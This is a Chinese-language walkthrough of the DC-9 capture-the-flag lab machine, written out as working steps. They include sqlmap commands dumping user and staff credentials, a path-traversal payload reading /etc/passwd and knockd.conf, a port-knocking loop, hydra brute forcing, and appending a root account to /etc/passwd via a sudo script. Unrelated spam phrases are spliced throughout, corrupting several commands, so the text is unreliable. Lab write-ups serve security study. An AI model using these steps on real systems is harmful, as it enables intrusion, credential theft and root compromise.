靶机DC-9

靶机下载地址:​​https://www.five86.com/dc-9.html​​

靶机设置为NAT模式,使用Nmap扫描网段

确定靶机IP地址

有80端口去访问下网站

发现display界面有用户信息

可以搜索界面网络安全知识去搜索用户名

搜索的时候要注意下,输一个就可以了 "first o洞藏9r last name"


                                            靶机DC-9

网络安全知识便试了个万能语句发现有sdc靶机ql注入


                                            靶机DC-9

把抓的包sqlmap使用教程导出,sqlmap跑post注入


                                            靶机DC-9

sqlmap四连

sqlmap -r ./home/kali/Desktop/dc9 --dbs


                                            靶机DC-9

sqlmap -r ./home/kali/Desktop/dc9 --tables -D users


                                            靶机DC-9

sqlmap -r ./home/kali/Desktop/dc9 --columns -T UserDetails -D users


                                            靶机DC-9

sqlmap -r ./home/kali/Desktop/dc9 --dump -C "username,password" -T UserDetails -D users

由于登录处需要的是username,这里的跑参数注意下


                                            靶机DC-9

竟然登不上,跑了下别的库,找到了安全技术交底admin密码

sqlmap -r ./home/kali/Desktop/dc9 --dump -C "Username,Password" -T Users -D Staff


                                            靶机DC-9

md5解密,admin/transorbital安全技术类别c类1


                                            靶机DC-9

admin登录成功


                                            靶机DC-9

发现页sqlmap命令面显示File does not exist 文件不存在

洞藏9年多少钱一瓶下文件包含?file=../..网络安全法/../../etc/passwd安全技术


                                            靶机DC-9

找不到啥东西了,试下ssh也登不上,ssh状态为filtsqlmaper电池90%需要换吗ed,一般是被防火墙过滤了

查了下是ssh开启了knockd,端口敲门

需要按照指定顺序敲击端口,如果敲击的网络安全法端口和顺洞藏9年多少钱一瓶序正确,防火墙会更改策略对该安全技术与管理专业访问ip放行,来达到访问效果

访问下knockd配置文件

?fil洞藏9e=../../../../etc/knockd.conf


                                            靶机DC-9

分别去敲击指定端网络安全法立法的首要目的是口,sssqlmap使用教程h状态变成open

for x in 7469 8475 9842;do nmap -Pn --max-retries 0 -p $x 192.168.74.133;done


                                            靶机DC-9

然后使用之前跑出来的账号密码尝试登陆ssh

使用hydra进行测试,发现了三组账号


                                            靶机DC-9

在janitor中发现了几个密码,加到我们的密码字典中


                                            靶机DC-9

sudo -l发现test文件有root权限


                                            靶机DC-9

切换到test目录看下sqlmap安装,找下这个test.py

在/opt/devstuff目录下


                                            靶机DC-9

脚本的作用就是将第一个文件的内容附加到另一个文件里面去

在etc/passwd文件里进行写入账号密码

运行脚本的时候最好切换到test目电池90是什么意思录下

如果试了好几次都没登上的话,可能在/etc/sqlmap安装passwd文件里写入了多条账号相同但密dc9527cc码不同的信息

openssl passwd -1 -salt dc 123456
echo 'dc:$1$dc$5uDk4oYnRiBs0fFGlcRwy.:0:0:root:/bin/bash' >> /tmp/dc
sudo ./test /tmp/dc /etc/passwd


                                            靶机DC-9

写入完成后登录dc9v接口是什么意思到我们创建的新账号

在root目录下获取flag


                                            靶机DC-9